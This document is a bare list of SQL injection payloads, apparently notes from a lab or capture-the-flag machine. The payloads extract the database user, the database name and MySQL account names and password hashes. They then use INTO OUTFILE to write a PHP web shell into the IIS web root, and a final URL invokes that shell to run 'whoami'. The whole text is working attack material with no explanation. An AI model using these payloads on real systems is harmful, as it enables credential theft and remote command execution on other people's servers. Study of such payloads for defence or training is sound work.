'union all select 1,user(),3,4,5,6 #
'union all select 1,database(),3,4,5,6 #
'union all select 1,user,3,4,5,6 from `mysql`.`user` #
'union all select 1,concat(user,0x3a,password),3,4,5,6 from `mysql`.`user` #
'; select "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'C:\\inetpub\\wwwroot\\sqd.php' ; #
http://10.10.10.167/sqd.php?cmd=whoami
